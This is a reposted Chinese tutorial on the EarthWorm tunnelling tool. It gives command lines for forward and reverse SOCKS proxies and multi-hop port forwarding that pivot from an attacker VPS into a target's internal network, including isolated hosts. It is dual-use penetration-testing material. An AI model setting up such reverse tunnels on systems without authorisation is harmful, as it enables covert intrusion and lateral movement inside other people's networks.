【代理篇】内网穿透利器——EarthWorm
生活随笔
收集整理的這篇文章主要介紹了
【代理篇】内网穿透利器——EarthWorm
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
0x01 概述
1、工具介紹
EarthWorm是一套便攜式的網絡穿透工具,具有 SOCKS v5服務架設和端口轉發兩大核心功能,能夠以“正向”、“反向”、“多級級聯”等方式打通一條網絡隧道,直達網絡深處,可在復雜網絡環境下完成網絡穿透。工具包中提供了多種可執行文件,以適用Linux、Windows、MacOS、Arm-Linux等不同的操作系統。
EarthWorm提供6種功能:
ssocksd rssocks rcsocks lcx_listen lcx_tran lcx_slave //通過-s參數指定
各命令用法解釋:
(1)./ew -s ssocksd -l 1080 //開啟正向socks服務 (2)./ew -s rcsocks -l 1080 -e 8888 //監聽1080端口,1080接收的數據通過8888交互傳遞 (3)./ew -s rssocks -d rev_ip -e 8888 //開啟反向socks服務。反向連接rev_ip的8888端口 (4)./ew -s lcx_listen -l 1080 -e 8888 //監聽1080端口,1080接收的數據通過8888交互傳遞 (5)./ew -s lcx_tran -l 1080 -f forward_ip -g 8888 //監聽1080端口,1080接收的數據正向傳給forward_ip的8888端口 (6)./ew -s lcx_slave -d vps_ip -e 8888 -f B_ip -g 9999 //作為中間角色,反向連接vps的8888,正向連接B的9999。打通兩者
工具使用幫助:
0x02 不同場景中的使用
1、目標在公網
使用:
(1)目標A:ew_for_win.exe -s ssocksd -l 1080 (2)PC:socks代理連接目標A的1080端口,即可代理近目標內網
效果
2、目標在內網(能出網)
使用:
(1)在vps運行:ew_for_win.exe -s rcsocks -l 1080 -e 8888 (2)在目標A運行:ew_for_win.exe -s rssocks -d vps_ip -e 8888 (3)socks代理連接vps_ip的1080端口,即可代理近目標內網
效果:
3、目標B在內網(不出網,通出網機器A)
(1)A→B正向連接
使用
a.在vps運行:ew_for_win.exe -s lcx_listen -l 1080 -e 8888 b.在目標B運行:ew_for_win.exe -s ssocksd -l 9999 c.在出網機器A運行:ew_for_win.exe -s lcx_slave -d vps_ip -e 8888 -f B_ip -g 9999
效果:
(2)A←B反向連接
使用:
a.在vps運行:ew_for_win.exe -s rcsocks -l 1080 -e 8888 b.在出網機器A運行:ew_for_win.exe -s lcx_tran -l 9999 -f vps_ip -g 8888 c.在目標B運行:ew_for_win.exe -s rssocks -d A_ip -e 9999
效果:
0x03 總結
1、小結
(1)SOCKS5 服務的核心邏輯支持由 ssocksd 和 rssocks 提供,分別對應正向與反向socks代理。rssocks需要與rcsocks共同使用。 (2)lcx_xxxx用于打通vps和socks服務器之間的鏈路 (3)-d 8.8.8.8 -e 8888 用于反向連接;-f 8.8.8.8 -g 9999 用于正向連接
總結
以上是生活随笔為你收集整理的【代理篇】内网穿透利器——EarthWorm的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: SAP UI5 Fiori startu
- 下一篇: SAP UI5 Nav containe